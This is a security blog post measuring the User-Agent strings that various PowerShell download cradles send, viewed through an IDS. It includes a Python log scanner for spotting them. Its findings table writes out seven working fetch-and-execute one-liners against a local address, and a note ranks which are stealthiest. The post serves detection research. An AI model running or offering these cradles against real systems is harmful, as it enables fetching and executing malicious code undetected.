Intro
There was recently a Twitter discussion around PowerShell download cradles and the User Agents they use. I decided to take a look via IDS.
Methodology
I grabbed this list of cradles from @harmj0y's GitHub page and ran through all of them, hosting a benign PowerShell script on a local web server. I then used the awesome SELKS IDS distribution to take a look at the User Agents these various methods used.
Findings
| Command | User-Agent |
| --- | --- |
| `IEX (New-Object Net.Webclient).downloadstring("http://192.168.1.116/hey.ps1")` | No User Agent |
| `IEX (iwr 'http://192.168.1.116/hey.ps1')` | Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.483 |
| `$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.1.116/hey.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r` | N/A (couldn't get this one to work) |
| `$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.1.116/hey.ps1',$false);$h.send();iex $h.responseText` | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E) |
| `$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://192.168.1.116/hey.ps1',$false);$h.send();iex $h.responseText` | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) |
| `Import-Module bitstransfer;Start-BitsTransfer 'http://192.168.1.116/hey2.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r` | Microsoft BITS/7.8 |
| `$a = New-Object System.Xml.XmlDocument; $a.Load("http://192.168.1.116/hey.txt"); $a.command.a.execute \| iex` | No User Agent |
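As an added example (not part of the original post): a small Python script that parses web-server access-log lines in Combined Log Format and matches the User-Agent field against the strings observed in the table above. The log lines, client addresses and confidence labels below are constructed for illustration. Two caveats are built in: the Msxml2 string is the generic IE-compatible User-Agent that plenty of legitimate WinINet-based clients also send, so it is scored lower, and the two "No User Agent" cradles can only be caught as an empty UA field, which is a weak signal by itself and is only bumped when the request is for a script file.

```python
import re
from dataclasses import dataclass

# User-Agent substrings observed for the cradles tested above.
# Confidence reflects how specific each string is to PowerShell/cradle use:
# WinHttpRequest, WindowsPowerShell/ and BITS/ are fairly specific; the
# MSIE 7.0 / Trident string is shared with many legitimate WinINet clients.
CRADLE_UA_PATTERNS = [
    ("Invoke-WebRequest",      re.compile(r"WindowsPowerShell/\d"), "medium"),
    ("WinHttp.WinHttpRequest", re.compile(r"WinHttp\.WinHttpRequest"), "medium"),
    ("BITS",                   re.compile(r"^Microsoft BITS/"), "medium"),
    ("Msxml2.XMLHTTP/WinINet", re.compile(r"^Mozilla/4\.0 \(compatible; MSIE 7\.0;.*Trident/7\.0"), "low"),
]

# Requests for script-like resources raise the confidence one step.
SCRIPT_EXT = re.compile(r"\.(ps1|psm1|txt|bat|vbs)(\s|$)", re.IGNORECASE)
BUMP = {"low": "medium", "medium": "high", "high": "high"}

# Combined Log Format: ip ident user [ts] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass
class Finding:
    ip: str
    request: str
    user_agent: str
    label: str
    confidence: str


def classify_user_agent(ua):
    """Return (label, confidence) for a User-Agent string, or (None, None) if benign-looking."""
    if ua in ("", "-"):
        # Net.WebClient and XmlDocument cradles sent no UA at all; the web server logs "-".
        return ("no-user-agent", "low")
    for label, pattern, confidence in CRADLE_UA_PATTERNS:
        if pattern.search(ua):
            return (label, confidence)
    return (None, None)


def scan_access_log(lines):
    """Parse access-log lines and return Finding objects for cradle-like User-Agents."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not Combined Log Format
        label, confidence = classify_user_agent(m["ua"])
        if label is None:
            continue
        request = m["req"]
        if SCRIPT_EXT.search(request):
            confidence = BUMP[confidence]
        findings.append(Finding(m["ip"], request, m["ua"], label, confidence))
    return findings


# Constructed sample log lines (not real traffic); the UA strings are the ones from the table.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2017:13:55:36 +0000] "GET /hey.ps1 HTTP/1.1" 200 512 "-" "-"',
    '10.0.0.5 - - [10/Oct/2017:13:56:01 +0000] "GET /hey.ps1 HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.483"',
    '10.0.0.5 - - [10/Oct/2017:13:56:20 +0000] "GET /hey.ps1 HTTP/1.1" 200 512 "-" '
    '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)"',
    '10.0.0.5 - - [10/Oct/2017:13:56:45 +0000] "GET /hey.ps1 HTTP/1.1" 200 512 "-" '
    '"Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"',
    '10.0.0.5 - - [10/Oct/2017:13:57:02 +0000] "GET /hey2.ps1 HTTP/1.1" 200 512 "-" "Microsoft BITS/7.8"',
    '10.0.0.9 - - [10/Oct/2017:13:57:30 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0 Safari/537.36"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.confidence:6} {f.ip:10} {f.label:24} {f.request}")
```

Run it as-is to see the five flagged requests; the ordinary Chrome request is not reported. The useful takeaway matches the post's conclusion: only the WinHttpRequest, WindowsPowerShell/ and BITS strings give a usable signal from web logs alone, and even those are better used to enrich PowerShell and Sysmon telemetry than as stand-alone alerts.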
Notes
- Fairly interesting findings. I'm not sure if this was an exhaustive list of cradles. If anyone has more they'd like tested just message me on twitter @Antonlovesdnb
- From a stealth point of view, at least as far as User Agents go, the first and last methods in the table (the two that send no User Agent at all) seem the stealthiest. The BITS method is interesting as well: depending on the organization's traffic profile, BITS traffic might be very common.
- I ran these tests on a Windows 10 host with the latest updates and PSv5:

      Major  Minor  Build  Revision
      -----  -----  -----  --------
      5      1      15063  483
- I was kind of hoping that each method would leave a unique User Agent that I could build some kind of IDS alert around, but this doesn't seem to be the case. Your best bet in identifying malicious activity of this sort is PowerShell logging + Sysmon.
Hope this was helpful.